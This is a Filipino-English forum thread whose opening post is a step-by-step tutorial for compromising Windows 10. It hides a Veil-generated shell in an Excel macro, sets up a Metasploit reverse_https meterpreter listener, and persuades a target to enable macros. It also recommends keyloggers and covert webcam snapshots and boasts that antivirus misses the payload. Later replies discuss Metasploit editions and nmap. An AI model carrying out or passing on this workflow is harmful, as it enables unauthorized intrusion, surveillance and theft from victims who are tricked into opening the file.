What's new

Closed (How to häçk) Windows 10 - Kali Linux 2 Part 2

Status
Not open for further replies.

Nicolandia15

Eternal Poster
Joined
Jan 12, 2016
Posts
581
Reaction
506
Points
270
howtoown_windows10_part2.jpg
Welcome sa Part 2 on How to Own Windows 10 using Kali Linux with Metasploit and Veil Evasion

Step 8:
Enable natin yung Developer Tab sa Excel. I'm using Excel 2013 currently.
File > Options > Customized Ribbon then sa right side check mo lang yung Developer just like sa screenshot.

tut11.jpg


After nun click mo yung Developer Tab then Visual Basic

tut33.jpg


Then paste mo yung shell na ginawa natin previously. Looks like this

tut22.jpg


Save mo yung file. Para mas effective lagyan mo ng kung ano anong text yung Excel. Nakakapagtaka pag empty lang.

Step 9:
Back to Kali, setup natin yung listener.
Type mo yung
Code:
msfconsole
Load natin yung handler
Code:
use exploit/multi/handler
Load natin yung PAYLOAD
Code:
set PAYLOAD windows/meterpreter/reverse_https
Set natin yung LHOST ulit gamit yung local IP mo or public kung gusto mo tong gawin sa WAN

tut55.jpg


Optional:
Code:
show options
Para ma sure lang na walang mali

Step 10:
Start natin yung listener
Code:
exploit -j
tut66.jpg


At this point. I assume na na send mo na sa target yung excel file. Make sure na naka open na yung listener bago nya ma open just to make sure na magka session tayo sa meterpreter. Kailangan niya din i-enable yung macro sa Excel na na receive nya. May pop-up yun pag inopen niya na yung file, dagdag mo na lang yung instructions para ma sure (Social Engineering baby!)

Once ma open na ng target yung file. Type this para mag interact. Disregard yung yahoo! sa screenshot. Local IP lang yan since I target my other machine na naka connect sa same network. Palitan mo lang ng public IP mo kung gusto mo siya gumana over WAN
Code:
sessions -i 1

tut77.jpg


There you go! Kaw na bahala after jan. Basta may access na tayo. As long na nakabukas yung Excel file may session tayo. You can run any other meterpreter code or mag upload ng ibang exploit like keyboard sniffer. Pero yung favorite ko webcam snap. Kukuha siya ng snapshot kung may web camera man na gamit yung target.

tut88.jpg


Ulit. After nung session nag run ako ng full scan using Avira and malinis wala siyang nakita. Nakaupo sa memory yung shell btw. Pag chineck mo naman yung process sa Windows may terminal ka na makikita na naka open so pag wala kang naalala na inopen yun then somebody is accessing your machine remotely. What to do? Close mo yung file then reinstall. So far yun lang yung best na panlaban.

FAQ:
Q: Persistent yung payload?
A: Nope. Once ma close yung file ma cclose na yung session. So once nagka session ka, use other meterpreter payload na persistent and hope hindi mahuli ng antivirus.
 
Last edited:
ano po ba yung pinag kaiba ng license na meta sa framework ng kali?

Wala namang notable difference yung meron sa Pro versus Community Edition, there are few though. Yung para sa mga veteran pentesters na gumagamit ng pro mas napapadali buhay nila kasi mas organize yung Pro Edition, may mga konting tools na nadagdag, organize reports, web app scanning, bruteforce credentials and such.

Meron pa din naman mga pro na gumagamit ng Community Edition. Tsaka take note, Metasploit Pro? $7000 price tag. Unless nagtatrabaho ka sa malaking company, walang bibili nun. :)
 
Wew din, may brief explanation na ko sa reply ko kung ano meron sa Pro. Eto pa:
  • Wizards for standard baseline audits
  • Task chains for automated custom workflows
  • MetaModules for discrete tasks such as network segmentation testing
  • Dynamic payloads to evade leading anti-virus solutions
  • Full access to an internal network through a compromised machine with VPN pivoting
  • Closed-loop vulnerability validation to prioritize remediation
  • Phishing awareness management & spear phishing
  • Web app testing for OWASP Top 10 vulnerabilities
  • Choice of advanced command-line (Pro Console) and web interface
  • Integrations via Remote API

Source: Rapid7
 
Wew din, may brief explanation na ko sa reply ko kung ano meron sa Pro. Eto pa:
  • Wizards for standard baseline audits
  • Task chains for automated custom workflows
  • MetaModules for discrete tasks such as network segmentation testing
  • Dynamic payloads to evade leading anti-virus solutions
  • Full access to an internal network through a compromised machine with VPN pivoting
  • Closed-loop vulnerability validation to prioritize remediation
  • Phishing awareness management & spear phishing
  • Web app testing for OWASP Top 10 vulnerabilities
  • Choice of advanced command-line (Pro Console) and web interface
  • Integrations via Remote API

Source: Rapid7
what i mean bakit ang mhal nong software na yon..kung my open source naman na konti ng pinagkaiba...pa assist nga pla ako sa port ko hehe out off topic
 
what i mean bakit ang mhal nong software na yon..kung my open source naman na konti ng pinagkaiba...pa assist nga pla ako sa port ko hehe out off topic
License yung Metasploit eh, tsaka mas sikat yung Community Edition, hindi naman mahal yun kung malaking company yung hawak mo at security ng data or website ang pinaka importante sa'yo. As always, out of topic. PM na lang. :)
 
request ako sir/ate about nmap at proxychains naman nalilito ako sa os detection scan ako aking sariling ip pero Linux ang lumabas , nakavirtual box ako , windows 8.1 , Network adapter ko bridged adapter , at sa proxychains ko naman gusto ko sana itunnel ito sa TOR.
 
Status
Not open for further replies.

Similar threads

Back
Top